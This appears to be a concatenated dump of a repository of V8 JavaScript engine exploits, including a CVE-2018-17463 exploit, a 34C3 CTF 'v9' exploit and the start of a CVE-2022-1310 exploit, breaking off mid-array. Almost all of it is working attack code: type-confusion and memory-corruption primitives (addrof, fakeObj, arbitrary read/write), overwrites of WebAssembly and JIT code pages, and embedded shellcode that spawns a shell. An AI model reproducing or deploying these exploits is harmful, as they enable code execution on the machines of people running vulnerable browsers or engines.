a.pop(); 132 | } 133 | 134 | main(empty); 135 | main(empty); 136 | 137 | main(p); 138 | 139 | var wasmCode2 = new Uint8Array([ 140 | 0, 97, 115, 109, 1, 0, 0, 0, 1, 5, 1, 96, 0, 1, 124, 3, 2, 1, 0, 7, 8, 1, 4, 141 | 109, 97, 105, 110, 0, 0, 10, 73, 1, 71, 0, 68, 184, 47, 115, 104, 0, 144, 235, 142 | 7, 68, 72, 193, 224, 32, 144, 144, 235, 7, 68, 187, 47, 98, 105, 110, 144, 143 | 235, 7, 68, 72, 1, 216, 80, 144, 144, 235, 7, 68, 72, 137, 231, 72, 49, 246, 144 | 235, 7, 68, 72, 49, 210, 72, 49, 192, 235, 7, 68, 176, 59, 15, 5, 144, 144, 145 | 144, 144, 26, 26, 26, 26, 26, 26, 11, 146 | ]); 147 | var wasmModule2 = new WebAssembly.Module(wasmCode2); 148 | var wasmInstance2 = new WebAssembly.Instance(wasmModule2, {}); 149 | var f2 = wasmInstance2.exports.main; 150 | 151 | var wasmCode = new Uint8Array([ 152 | 0, 97, 115, 109, 1, 0, 0, 0, 1, 133, 128, 128, 128, 0, 1, 96, 0, 1, 127, 3, 153 | 130, 128, 128, 128, 0, 1, 0, 4, 132, 128, 128, 128, 0, 1, 112, 0, 0, 5, 131, 154 | 128, 128, 128, 0, 1, 0, 1, 6, 129, 128, 128, 128, 0, 0, 7, 145, 128, 128, 128, 155 | 0, 2, 6, 109, 101, 109, 111, 114, 121, 2, 0, 4, 109, 97, 105, 110, 0, 0, 10, 156 | 138, 128, 128, 128, 0, 1, 132, 128, 128, 128, 0, 0, 65, 42, 11, 157 | ]); 158 | var wasmModule = new WebAssembly.Module(wasmCode); 159 | var wasmInstance = new WebAssembly.Instance(wasmModule, {}); 160 | var f = wasmInstance.exports.main; 161 | 162 | function addrof(o) { 163 | obj_arr[0] = o; 164 | return helper.ftoil(b[17]); 165 | } 166 | 167 | function aar(addr) { 168 | b[15] = helper.pair_i32_to_f64(addr - 8, 8); 169 | return dbl_arr[0]; 170 | } 171 | 172 | function aaw(addr, value) { 173 | b[15] = helper.pair_i32_to_f64(addr - 8, 8); 174 | dbl_arr[0] = value; 175 | } 176 | 177 | let Instance_addr = addrof(wasmInstance); 178 | console.log("Instance_addr: ", helper.hex(Instance_addr)); 179 | let jt = Instance_addr + 0x48; 180 | 181 | let Instance2_addr = addrof(wasmInstance2); 182 | console.log("Instance2_addr: ", helper.hex(Instance2_addr)); 183 | let jt2 = Instance2_addr + 0x48; 184 | let jta2 = helper.f64toi64(aar(jt2)); 185 | console.log("jump table addr2: ", helper.hex(jta2)); 186 | 187 | aaw(jt, helper.i64tof64(jta2 + 0x81an)); 188 | 189 | for (var i = 0; i < 0x10000; i++) { 190 | f2(); 191 | } 192 | 193 | for (var i = 0; i < 0x10000; i++) {} 194 | 195 | f(); 196 | -------------------------------------------------------------------------------- /CVE-2018-17463.js: -------------------------------------------------------------------------------- 1 | function gc() { 2 | /*fill-up the 1MB semi-space page, force V8 to scavenge NewSpace.*/ 3 | for (var i = 0; i < ((1024 * 1024) / 0x10); i++) { 4 | var a = new String(); 5 | } 6 | } 7 | 8 | function give_me_a_clean_newspace() { 9 | /*force V8 to scavenge NewSpace twice to get a clean NewSpace.*/ 10 | gc() 11 | gc() 12 | } 13 | 14 | let floatView = new Float64Array(1); 15 | let uint64View = new BigUint64Array(floatView.buffer); 16 | 17 | Number.prototype.toBigInt = function toBigInt() { 18 | floatView[0] = this; 19 | return uint64View[0]; 20 | }; 21 | 22 | BigInt.prototype.toNumber = function toNumber() { 23 | uint64View[0] = this; 24 | return floatView[0]; 25 | }; 26 | 27 | function hex(b) { 28 | return ('0' + b.toString(16)).substr(-2); 29 | } 30 | 31 | // Return the hexadecimal representation of the given byte array. 32 | function hexlify(bytes) { 33 | var res = []; 34 | for (var i = 0; i < bytes.length; i++) 35 | res.push(hex(bytes[i])); 36 | return res.join(''); 37 | } 38 | 39 | // Return the binary data represented by the given hexdecimal string. 40 | function unhexlify(hexstr) { 41 | if (hexstr.length % 2 == 1) 42 | throw new TypeError("Invalid hex string"); 43 | var bytes = new Uint8Array(hexstr.length / 2); 44 | for (var i = 0; i < hexstr.length; i += 2) 45 | bytes[i / 2] = parseInt(hexstr.substr(i, 2), 16); 46 | return bytes; 47 | } 48 | 49 | function hexdump(data) { 50 | if (typeof data.BYTES_PER_ELEMENT !== 'undefined') 51 | data = Array.from(data); 52 | var lines = []; 53 | for (var i = 0; i < data.length; i += 16) { 54 | var chunk = data.slice(i, i + 16); 55 | var parts = chunk.map(hex); 56 | if (parts.length > 8) 57 | parts.splice(8, 0, ' '); 58 | lines.push(parts.join(' ')); 59 | } 60 | return lines.join('\n'); 61 | } 62 | 63 | // Simplified version of the similarly named python module. 64 | var Struct = (function () { 65 | // Allocate these once to avoid unecessary heap allocations during pack/unpack operations. 66 | var buffer = new ArrayBuffer(8); 67 | var byteView = new Uint8Array(buffer); 68 | var uint32View = new Uint32Array(buffer); 69 | var float64View = new Float64Array(buffer); 70 | return { 71 | pack: function (type, value) { 72 | var view = type; // See below 73 | view[0] = value; 74 | return new Uint8Array(buffer, 0, type.BYTES_PER_ELEMENT); 75 | }, 76 | unpack: function (type, bytes) { 77 | if (bytes.length !== type.BYTES_PER_ELEMENT) 78 | throw Error("Invalid bytearray"); 79 | var view = type; // See below 80 | byteView.set(bytes); 81 | return view[0]; 82 | }, 83 | // Available types. 84 | int8: byteView, 85 | int32: uint32View, 86 | float64: float64View 87 | }; 88 | })(); 89 | // 90 | // Tiny module that provides big (64bit) integers. 91 | // 92 | // Copyright (c) 2016 Samuel Groß 93 | // 94 | // Requires utils.js 95 | // 96 | // Datatype to represent 64-bit integers. 97 | // 98 | // Internally, the integer is stored as a Uint8Array in little endian byte order. 99 | function Int64(v) { 100 | // The underlying byte array. 101 | var bytes = new Uint8Array(8); 102 | switch (typeof v) { 103 | case 'number': 104 | v = '0x' + Math.floor(v).toString(16); 105 | case 'string': 106 | if (v.startsWith('0x')) 107 | v = v.substr(2); 108 | if (v.length % 2 == 1) 109 | v = '0' + v; 110 | var bigEndian = unhexlify(v, 8); 111 | bytes.set(Array.from(bigEndian).reverse()); 112 | break; 113 | case 'object': 114 | if (v instanceof Int64) { 115 | bytes.set(v.bytes()); 116 | } else { 117 | if (v.length != 8) 118 | throw TypeError("Array must have excactly 8 elements."); 119 | bytes.set(v); 120 | } 121 | break; 122 | case 'undefined': 123 | break; 124 | default: 125 | throw TypeError("Int64 constructor requires an argument."); 126 | } 127 | // Return a double whith the same underlying bit representation. 128 | this.asDouble = function () { 129 | // Check for NaN 130 | if (bytes[7] == 0xff && (bytes[6] == 0xff || bytes[6] == 0xfe)) 131 | throw new RangeError("Integer can not be represented by a double"); 132 | return Struct.unpack(Struct.float64, bytes); 133 | }; 134 | // Return a javascript value with the same underlying bit representation. 135 | // This is only possible for integers in the range [0x0001000000000000, 0xffff000000000000) 136 | // due to double conversion constraints. 137 | this.asJSValue = function () { 138 | if ((bytes[7] == 0 && bytes[6] == 0) || (bytes[7] == 0xff && bytes[6] == 0xff)) 139 | throw new RangeError("Integer can not be represented by a JSValue"); 140 | // For NaN-boxing, JSC adds 2^48 to a double value's bit pattern. 141 | this.assignSub(this, 0x1000000000000); 142 | var res = Struct.unpack(Struct.float64, bytes); 143 | this.assignAdd(this, 0x1000000000000); 144 | return res; 145 | }; 146 | // Return the underlying bytes of this number as array. 147 | this.bytes = function () { 148 | return Array.from(bytes); 149 | }; 150 | // Return the byte at the given index. 151 | this.byteAt = function (i) { 152 | return bytes[i]; 153 | }; 154 | // Return the value of this number as unsigned hex string. 155 | this.toString = function () { 156 | return '0x' + hexlify(Array.from(bytes).reverse()); 157 | }; 158 | // Basic arithmetic. 159 | // These functions assign the result of the computation to their 'this' object. 160 | // Decorator for Int64 instance operations. Takes care 161 | // of converting arguments to Int64 instances if required. 162 | function operation(f, nargs) { 163 | return function () { 164 | if (arguments.length != nargs) 165 | throw Error("Not enough arguments for function " + f.name); 166 | for (var i = 0; i < arguments.length; i++) 167 | if (!(arguments[i] instanceof Int64)) 168 | arguments[i] = new Int64(arguments[i]); 169 | return f.apply(this, arguments); 170 | }; 171 | } 172 | 173 | // this = -n (two's complement) 174 | this.assignNeg = operation(function neg(n) { 175 | for (var i = 0; i < 8; i++) 176 | bytes[i] = ~n.byteAt(i); 177 | return this.assignAdd(this, Int64.One); 178 | }, 1); 179 | // this = a + b 180 | this.assignAdd = operation(function add(a, b) { 181 | var carry = 0; 182 | for (var i = 0; i < 8; i++) { 183 | var cur = a.byteAt(i) + b.byteAt(i) + carry; 184 | carry = cur > 0xff | 0; 185 | bytes[i] = cur; 186 | } 187 | return this; 188 | }, 2); 189 | // this = a - b 190 | this.assignSub = operation(function sub(a, b) { 191 | var carry = 0; 192 | for (var i = 0; i < 8; i++) { 193 | var cur = a.byteAt(i) - b.byteAt(i) - carry; 194 | carry = cur < 0 | 0; 195 | bytes[i] = cur; 196 | } 197 | return this; 198 | }, 2); 199 | } 200 | 201 | // Constructs a new Int64 instance with the same bit representation as the provided double. 202 | Int64.fromDouble = function (d) { 203 | var bytes = Struct.pack(Struct.float64, d); 204 | return new Int64(bytes); 205 | }; 206 | // Convenience functions. These allocate a new Int64 to hold the result. 207 | // Return -n (two's complement) 208 | function Neg(n) { 209 | return (new Int64()).assignNeg(n); 210 | } 211 | 212 | // Return a + b 213 | function Add(a, b) { 214 | return (new Int64()).assignAdd(a, b); 215 | } 216 | 217 | // Return a - b 218 | function Sub(a, b) { 219 | return (new Int64()).assignSub(a, b); 220 | } 221 | 222 | // Some commonly used numbers. 223 | Int64.Zero = new Int64(0); 224 | Int64.One = new Int64(1); 225 | 226 | function utf8ToString(h, p) { 227 | let s = ""; 228 | for (i = p; h[i]; i++) { 229 | s += String.fromCharCode(h[i]); 230 | } 231 | return s; 232 | } 233 | 234 | function log(x, y = ' ') { 235 | print("[+] log:", x, y); 236 | } 237 | 238 | // =================== // 239 | // Start here! // 240 | // =================== // 241 | 242 | function check_vul() { 243 | function vuln(x) { 244 | x.a; 245 | Object.create(x); 246 | return x.b; 247 | 248 | } 249 | 250 | for (let i = 0; i < 10000; i++) { 251 | let x = { a: 0x1234 }; 252 | x.b = 0x5678; 253 | let res = vuln(x); 254 | if (res != 0x5678) { 255 | log("CVE-2018-17463 exists in the d8"); 256 | return; 257 | } 258 | 259 | } 260 | throw "bad d8 version"; 261 | 262 | } 263 | 264 | function getObj(values) { 265 | let obj = { a: 1234 }; 266 | for (let i = 0; i < 32; i++) { 267 | Object.defineProperty(obj, 'b' + i, { 268 | writable: true, 269 | value: values[i] 270 | }); 271 | } 272 | return obj; 273 | } 274 | 275 | let p1, p2; 276 | 277 | function findOverlapping() { 278 | let names = []; 279 | for (let i = 0; i < 32; i++) { 280 | names[i] = 'b' + i; 281 | } 282 | 283 | eval(` 284 | function vuln(obj) { 285 | obj.a; 286 | this.Object.create(obj); 287 | ${names.map((b) => `let ${b} = obj.${b};`).join('\n')} 288 | return [${names.join(', ')}]; 289 | } 290 | `) 291 | 292 | let values = []; 293 | for (let i = 1; i < 32; i++) { 294 | values[i] = -i; 295 | } 296 | 297 | for (let i = 0; i < 10000; i++) { 298 | let res = vuln(getObj(values)); 299 | for (let i = 1; i < res.length; i++) { 300 | if (i !== -res[i] && res[i] < 0 && res[i] > -32) { 301 | [p1, p2] = [i, -res[i]]; 302 | return; 303 | } 304 | } 305 | } 306 | throw "[!] Failed to find overlapping"; 307 | } 308 | 309 | function addrof(obj) { 310 | eval(` 311 | function vuln(obj) { 312 | obj.a; 313 | this.Object.create(obj); 314 | return obj.b${p1}.x1; 315 | } 316 | `); 317 | 318 | 319 | let values = []; 320 | values[p1] = { x1: 1.1, x2: 1.2 }; 321 | values[p2] = { y: obj }; 322 | 323 | for (let i = 0; i < 10000; i++) { 324 | let res = vuln(getObj(values)); 325 | if (res != 1.1) { 326 | print(`[+] Object Address: ${Int64.fromDouble(res).toString()}`); 327 | return res; 328 | } 329 | } 330 | throw "[!] AddrOf Primitive Failed" 331 | } 332 | 333 | function fakeObj(obj, addr) { 334 | eval(` 335 | function vuln(obj) { 336 | obj.a; 337 | this.Object.create(obj); 338 | let orig = obj.b${p1}.x2; 339 | obj.b${p1}.x2 = ${addr}; 340 | return orig; 341 | } 342 | `); 343 | 344 | let values = []; 345 | let o = { x1: 1.1, x2: 1.2 }; 346 | values[p1] = o; 347 | values[p2] = obj; 348 | 349 | for (let i = 0; i < 10000; i++) { 350 | o.x2 = 1.2; 351 | let res = vuln(getObj(values)); 352 | if (res != 1.2) { 353 | return res; 354 | } 355 | } 356 | throw "[!] fakeObj Primitive Failed" 357 | } 358 | 359 | var wasmCode = new Uint8Array([0, 97, 115, 109, 1, 0, 0, 0, 1, 133, 128, 128, 128, 0, 1, 96, 0, 1, 127, 3, 130, 128, 128, 128, 0, 1, 0, 4, 132, 128, 128, 128, 0, 1, 112, 0, 0, 5, 131, 128, 128, 128, 0, 1, 0, 1, 6, 129, 128, 128, 128, 0, 0, 7, 145, 128, 128, 128, 0, 2, 6, 109, 101, 109, 111, 114, 121, 2, 0, 4, 109, 97, 105, 110, 0, 0, 10, 138, 128, 128, 128, 0, 1, 132, 128, 128, 128, 0, 0, 65, 42, 11]); 360 | var wasmModule = new WebAssembly.Module(wasmCode); 361 | var wasmInstance = new WebAssembly.Instance(wasmModule, {}); 362 | var f = wasmInstance.exports.main; 363 | print("[+] check whether vulnerability exists"); 364 | check_vul(); 365 | print("[+] Finding Overlapping Properties..."); 366 | findOverlapping(); 367 | print(`[+] Properties b${p1} and b${p2} overlap!`); 368 | let mem = new ArrayBuffer(1024); 369 | let dv = new DataView(mem); 370 | give_me_a_clean_newspace(); 371 | print("[+] get address of RWX Page"); 372 | let addr = addrof(wasmInstance); 373 | fakeObj(mem, addr); 374 | let code_addr = Int64.fromDouble(dv.getFloat64(0xf0 - 1, true)); 375 | print(`[+] rwx addr: ${code_addr}`); 376 | fakeObj(mem, code_addr.asDouble()); 377 | print("[+] write shellcode"); 378 | let shellcode = [ 379 | 0x2fbb485299583b6an, 380 | 0x5368732f6e69622fn, 381 | 0x050f5e5457525f54n 382 | ]; 383 | let data_view = new DataView(mem); 384 | for (let i = 0; i < 3; i++) 385 | data_view.setBigUint64(8 * i, shellcode[i], true); 386 | print("[+] GetShell"); 387 | f(); 388 | -------------------------------------------------------------------------------- /34C3-v9.js: -------------------------------------------------------------------------------- 1 | // 2 | // Utility functions. 3 | // 4 | 5 | // Return the hexadecimal representation of the given byte. 6 | function hex(b) { 7 | return ('0' + b.toString(16)).substr(-2); 8 | } 9 | 10 | // Return the hexadecimal representation of the given byte array. 11 | function hexlify(bytes) { 12 | var res = []; 13 | for (var i = 0; i < bytes.length; i++) 14 | res.push(hex(bytes[i])); 15 | return res.join(''); 16 | 17 | } 18 | 19 | // Return the binary data represented by the given hexdecimal string. 20 | function unhexlify(hexstr) { 21 | if (hexstr.length % 2 == 1) 22 | throw new TypeError("Invalid hex string"); 23 | 24 | var bytes = new Uint8Array(hexstr.length / 2); 25 | for (var i = 0; i < hexstr.length; i += 2) 26 | bytes[i / 2] = parseInt(hexstr.substr(i, 2), 16); 27 | 28 | return bytes; 29 | } 30 | 31 | function hexdump(data) { 32 | if (typeof data.BYTES_PER_ELEMENT !== 'undefined') 33 | data = Array.from(data); 34 | 35 | var lines = []; 36 | var chunk = data.slice(i, i + 16); 37 | for (var i = 0; i < data.length; i += 16) { 38 | var parts = chunk.map(hex); 39 | if (parts.length > 8) 40 | parts.splice(8, 0, ' '); 41 | lines.push(parts.join(' ')); 42 | } 43 | 44 | return lines.join('\n'); 45 | } 46 | 47 | // Simplified version of the similarly named python module. 48 | var Struct = (function () { 49 | // Allocate these once to avoid unecessary heap allocations during pack/unpack operations. 50 | var buffer = new ArrayBuffer(8); 51 | var byteView = new Uint8Array(buffer); 52 | var uint32View = new Uint32Array(buffer); 53 | var float64View = new Float64Array(buffer); 54 | 55 | return { 56 | pack: function (type, value) { 57 | var view = type; // See below 58 | view[0] = value; 59 | return new Uint8Array(buffer, 0, type.BYTES_PER_ELEMENT); 60 | }, 61 | 62 | unpack: function (type, bytes) { 63 | if (bytes.length !== type.BYTES_PER_ELEMENT) 64 | throw Error("Invalid bytearray"); 65 | 66 | var view = type; // See below 67 | byteView.set(bytes); 68 | return view[0]; 69 | }, 70 | 71 | // Available types. 72 | int8: byteView, 73 | int32: uint32View, 74 | float64: float64View 75 | }; 76 | })(); 77 | 78 | // 79 | // Tiny module that provides big (64bit) integers. 80 | // 81 | 82 | // Datatype to represent 64-bit integers. 83 | // 84 | // Internally, the integer is stored as a Uint8Array in little endian byte order. 85 | function Int64(v) { 86 | // The underlying byte array. 87 | var bytes = new Uint8Array(8); 88 | 89 | switch (typeof v) { 90 | case 'number': 91 | v = '0x' + Math.floor(v).toString(16); 92 | case 'string': 93 | if (v.startsWith('0x')) 94 | v = v.substr(2); 95 | if (v.length % 2 == 1) 96 | v = '0' + v; 97 | 98 | var bigEndian = unhexlify(v, 8); 99 | bytes.set(Array.from(bigEndian).reverse()); 100 | break; 101 | case 'object': 102 | if (v instanceof Int64) { 103 | bytes.set(v.bytes()); 104 | } else { 105 | if (v.length != 8) 106 | throw TypeError("Array must have excactly 8 elements."); 107 | bytes.set(v); 108 | } 109 | break; 110 | case 'undefined': 111 | break; 112 | default: 113 | throw TypeError("Int64 constructor requires an argument."); 114 | } 115 | 116 | // Return a double whith the same underlying bit representation. 117 | this.asDouble = function () { 118 | // Check for NaN 119 | if (bytes[7] == 0xff && (bytes[6] == 0xff || bytes[6] == 0xfe)) 120 | throw new RangeError("Integer can not be represented by a double"); 121 | 122 | return Struct.unpack(Struct.float64, bytes); 123 | }; 124 | 125 | // Return a javascript value with the same underlying bit representation. 126 | // This is only possible for integers in the range [0x0001000000000000, 0xffff000000000000) 127 | // due to double conversion constraints. 128 | this.asJSValue = function () { 129 | if ((bytes[7] == 0 && bytes[6] == 0) || (bytes[7] == 0xff && bytes[6] == 0xff)) 130 | throw new RangeError("Integer can not be represented by a JSValue"); 131 | 132 | // For NaN-boxing, JSC adds 2^48 to a double value's bit pattern. 133 | this.assignSub(this, 0x1000000000000); 134 | var res = Struct.unpack(Struct.float64, bytes); 135 | this.assignAdd(this, 0x1000000000000); 136 | 137 | return res; 138 | }; 139 | 140 | // Return the underlying bytes of this number as array. 141 | this.bytes = function () { 142 | return Array.from(bytes); 143 | }; 144 | 145 | // Return the byte at the given index. 146 | this.byteAt = function (i) { 147 | return bytes[i]; 148 | }; 149 | 150 | // Return the value of this number as unsigned hex string. 151 | this.toString = function () { 152 | return '0x' + hexlify(Array.from(bytes).reverse()); 153 | }; 154 | 155 | // Basic arithmetic. 156 | // These functions assign the result of the computation to their 'this' object. 157 | 158 | // Decorator for Int64 instance operations. Takes care 159 | // of converting arguments to Int64 instances if required. 160 | function operation(f, nargs) { 161 | return function () { 162 | if (arguments.length != nargs) 163 | throw Error("Not enough arguments for function " + f.name); 164 | for (var i = 0; i < arguments.length; i++) 165 | if (!(arguments[i] instanceof Int64)) 166 | arguments[i] = new Int64(arguments[i]); 167 | return f.apply(this, arguments); 168 | }; 169 | } 170 | 171 | // this = -n (two's complement) 172 | this.assignNeg = operation(function neg(n) { 173 | for (var i = 0; i < 8; i++) 174 | bytes[i] = ~n.byteAt(i); 175 | 176 | return this.assignAdd(this, Int64.One); 177 | }, 1); 178 | 179 | // this = a + b 180 | this.assignAdd = operation(function add(a, b) { 181 | var carry = 0; 182 | for (var i = 0; i < 8; i++) { 183 | var cur = a.byteAt(i) + b.byteAt(i) + carry; 184 | carry = cur > 0xff | 0; 185 | bytes[i] = cur; 186 | } 187 | return this; 188 | }, 2); 189 | 190 | // this = a - b 191 | this.assignSub = operation(function sub(a, b) { 192 | var carry = 0; 193 | for (var i = 0; i < 8; i++) { 194 | var cur = a.byteAt(i) - b.byteAt(i) - carry; 195 | carry = cur < 0 | 0; 196 | bytes[i] = cur; 197 | } 198 | return this; 199 | }, 2); 200 | 201 | // this = a & b 202 | this.assignAnd = operation(function and(a, b) { 203 | for (var i = 0; i < 8; i++) { 204 | bytes[i] = a.byteAt(i) & b.byteAt(i); 205 | } 206 | return this; 207 | }, 2); 208 | } 209 | 210 | // Constructs a new Int64 instance with the same bit representation as the provided double. 211 | Int64.fromDouble = function (d) { 212 | var bytes = Struct.pack(Struct.float64, d); 213 | return new Int64(bytes); 214 | }; 215 | 216 | // Convenience functions. These allocate a new Int64 to hold the result. 217 | 218 | // Return -n (two's complement) 219 | function Neg(n) { 220 | return (new Int64()).assignNeg(n); 221 | } 222 | 223 | // Return a + b 224 | function Add(a, b) { 225 | return (new Int64()).assignAdd(a, b); 226 | } 227 | 228 | // Return a - b 229 | function Sub(a, b) { 230 | return (new Int64()).assignSub(a, b); 231 | } 232 | 233 | // Return a & b 234 | function And(a, b) { 235 | return (new Int64()).assignAnd(a, b); 236 | } 237 | 238 | // Some commonly used numbers. 239 | Int64.Zero = new Int64(0); 240 | Int64.One = new Int64(1); 241 | 242 | function gc() { 243 | var i = 0; 244 | for (var i = 0; i < 10000; i++) { 245 | // Random code to trick the optimizer... 246 | var a = [1, 2, i, 3, 4]; 247 | i += a.sort()[0]; 248 | } 249 | } 250 | 251 | // =================== // 252 | // Start here! // 253 | // =================== // 254 | 255 | 256 | 257 | function addrof_one(obj) { 258 | function leak(o, callback) { 259 | var a = o.a; 260 | var _ = callback(a); 261 | return o.b; 262 | } 263 | 264 | for (var i = 0; i < 0x100000; i++) { 265 | leak({ a: 1.1, b: 2.2 }, (a) => { return a; }); 266 | } 267 | let o = { a: 1.1, b: 2.2 }; 268 | // let obj = {}; 269 | // % DebugPrint(obj); 270 | return leak(o, _ => { o.b = obj; }); 271 | } 272 | 273 | 274 | let memview_buf = new ArrayBuffer(1024); 275 | let driver_buf = new ArrayBuffer(1024); 276 | // % DebugPrint(memview_buf); 277 | // % SystemBreak(); 278 | gc(); 279 | 280 | let ad = addrof_one(memview_buf); 281 | 282 | // let obj = {}; 283 | // % DebugPrint(obj); 284 | // let t = addrof(obj); 285 | 286 | 287 | let o = { a: 1.1 }; 288 | o.b = 2.2; 289 | // let obj = new ArrayBuffer(1024); 290 | function poc(o, callback, value) { 291 | var a = o.a; 292 | callback(a); 293 | o.b = value; 294 | return o.b; 295 | } 296 | for (var i = 0; i < 0x100000; i++) { 297 | poc(o, (a) => { return a; }, 4.4); 298 | } 299 | 300 | let victim = { inline: 1.1 }; 301 | victim.a = {}; 302 | 303 | 304 | let v = poc(o, _ => { o.b = victim; }, Add(Int64.fromDouble(ad), 0x10).asDouble()); 305 | // print(Int64.fromDouble(v).toString()); 306 | 307 | o.b.a = driver_buf; 308 | // % DebugPrint(o.b); 309 | // % SystemBreak(); 310 | 311 | function aar(addr, len) { 312 | let dv = new Uint8Array(memview_buf); 313 | dv.set(addr.bytes(), 31); 314 | var memview = new Uint8Array(driver_buf); 315 | return memview.subarray(0, len); 316 | } 317 | 318 | function aaw(addr, value) { 319 | let dv = new Uint8Array(memview_buf); 320 | dv.set(addr.bytes(), 31); 321 | var memview = new Uint8Array(driver_buf); 322 | memview.set(value); 323 | } 324 | 325 | function addrof_two(obj) { 326 | function leak_two(o, callback) { 327 | var a = o.x; 328 | callback(a); 329 | return o.y; 330 | } 331 | 332 | for (var i = 0; i < 0x100000; i++) { 333 | leak_two({ x: 1.1, y: 2.2 }, (a) => { return a; }); 334 | } 335 | let o = { x: 1.1, y: 2.2 }; 336 | // let obj = {}; 337 | // % DebugPrint(obj); 338 | return leak_two(o, _ => { o.y = obj; }); 339 | // print(helper.hex(helper.ftoih(t)), helper.hex(helper.ftoil(t))); 340 | } 341 | 342 | function run_shellcode(x) { 343 | // Not (yet) the real run_shellcode ;) 344 | return x + 42; 345 | } 346 | for (var i = 0; i < 0x10000; i++) { 347 | run_shellcode(i); 348 | } 349 | 350 | // % DebugPrint(run_shellcode); 351 | var func_addr = Int64.fromDouble(addrof_two(run_shellcode)); 352 | // console.log("Function @ " + func_addr); 353 | var code_addr = aar(Add(func_addr, 55),8); 354 | // console.log("Code @ " + code_addr); 355 | var jitcode_addr = Add(code_addr, 95); 356 | // console.log("jit @ " + jitcode_addr); 357 | 358 | let shellcode = [72, 49, 255, 72, 247, 231, 101, 72, 139, 88, 96, 72, 139, 91, 24, 72, 139, 91, 32, 72, 139, 27, 72, 139, 27, 72, 139, 91, 32, 73, 137, 216, 139, 91, 60, 76, 1, 195, 72, 49, 201, 102, 129, 193, 255, 136, 72, 193, 233, 8, 139, 20, 11, 76, 1, 194, 77, 49, 210, 68, 139, 82, 28, 77, 1, 194, 77, 49, 219, 68, 139, 90, 32, 77, 1, 195, 77, 49, 228, 68, 139, 98, 36, 77, 1, 196, 235, 50, 91, 89, 72, 49, 192, 72, 137, 226, 81, 72, 139, 12, 36, 72, 49, 255, 65, 139, 60, 131, 76, 1, 199, 72, 137, 214, 243, 166, 116, 5, 72, 255, 192, 235, 230, 89, 102, 65, 139, 4, 68, 65, 139, 4, 130, 76, 1, 192, 83, 195, 72, 49, 201, 128, 193, 7, 72, 184, 15, 168, 150, 145, 186, 135, 154, 156, 72, 247, 208, 72, 193, 232, 8, 80, 81, 232, 176, 255, 255, 255, 73, 137, 198, 72, 49, 201, 72, 247, 225, 80, 72, 184, 156, 158, 147, 156, 209, 154, 135, 154, 72, 247, 208, 80, 72, 137, 225, 72, 255, 194, 72, 131, 236, 32, 65, 255, 214, 195]; 359 | 360 | aaw(jitcode_addr, shellcode); 361 | run_shellcode(); -------------------------------------------------------------------------------- /CVE-2022-1310.js: -------------------------------------------------------------------------------- 1 | class Helpers { 2 | constructor() { 3 | this.buf = new ArrayBuffer(8); 4 | this.dv = new DataView(this.buf); 5 | this.u8 = new Uint8Array(this.buf); 6 | this.u32 = new Uint32Array(this.buf); 7 | this.u64 = new BigUint64Array(this.buf); 8 | this.f32 = new Float32Array(this.buf); 9 | this.f64 = new Float64Array(this.buf); 10 | 11 | this.roots = new Array(0x30000); 12 | this.index = 0; 13 | } 14 | 15 | pair_i32_to_f64(p1, p2) { 16 | this.u32[0] = p1; 17 | this.u32[1] = p2; 18 | return this.f64[0]; 19 | } 20 | 21 | i64tof64(i) { 22 | this.u64[0] = i; 23 | return this.f64[0]; 24 | } 25 | 26 | f64toi64(f) { 27 | this.f64[0] = f; 28 | return this.u64[0]; 29 | } 30 | 31 | set_i64(i) { 32 | this.u64[0] = i; 33 | } 34 | 35 | set_l(i) { 36 | this.u32[0] = i; 37 | } 38 | 39 | set_h(i) { 40 | this.u32[1] = i; 41 | } 42 | 43 | get_i64() { 44 | return this.u64[0]; 45 | } 46 | 47 | ftoil(f) { 48 | this.f64[0] = f; 49 | return this.u32[0] 50 | } 51 | 52 | ftoih(f) { 53 | this.f64[0] = f; 54 | return this.u32[1] 55 | } 56 | 57 | add_ref(object) { 58 | this.roots[this.index++] = object; 59 | } 60 | 61 | mark_sweep_gc() { 62 | new ArrayBuffer(0x7fe00000); 63 | } 64 | 65 | scavenge_gc() { 66 | for (var i = 0; i < 8; i++) { 67 | // fill up new space external backing store bytes 68 | this.add_ref(new ArrayBuffer(0x200000)); 69 | } 70 | this.add_ref(new ArrayBuffer(8)); 71 | } 72 | 73 | hex(i) { 74 | return i.toString(16).padStart(16, "0"); 75 | } 76 | 77 | breakpoint() { 78 | this.buf.slice(); 79 | } 80 | } 81 | 82 | 83 | 84 | var helper = new Helpers(); 85 | 86 | var corrupted_array; 87 | var fake_object_array; 88 | 89 | var re = new RegExp('foo', 'g'); 90 | 91 | var match_object = {}; 92 | match_object[0] = { 93 | toString: function () { 94 | return ""; 95 | } 96 | }; 97 | 98 | re.exec = function () { 99 | helper.mark_sweep_gc(); 100 | delete re.exec; // transition back to initial regexp map 101 | re.lastIndex = 1073741823; // maximum smi, adding one will result in a HeapNumber 102 | new Array(256); // add space before NewHeapNumber 103 | RegExp.prototype.exec = function () { 104 | throw ''; // break out of Regexp.replace 105 | } 106 | return match_object; 107 | }; 108 | 109 | try { 110 | var newstr = re[Symbol.replace]("fooooo", ".$"); 111 | } catch (e) { } 112 | 113 | helper.scavenge_gc(); 114 | helper.mark_sweep_gc(); 115 | 116 | fake_object_array = [1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 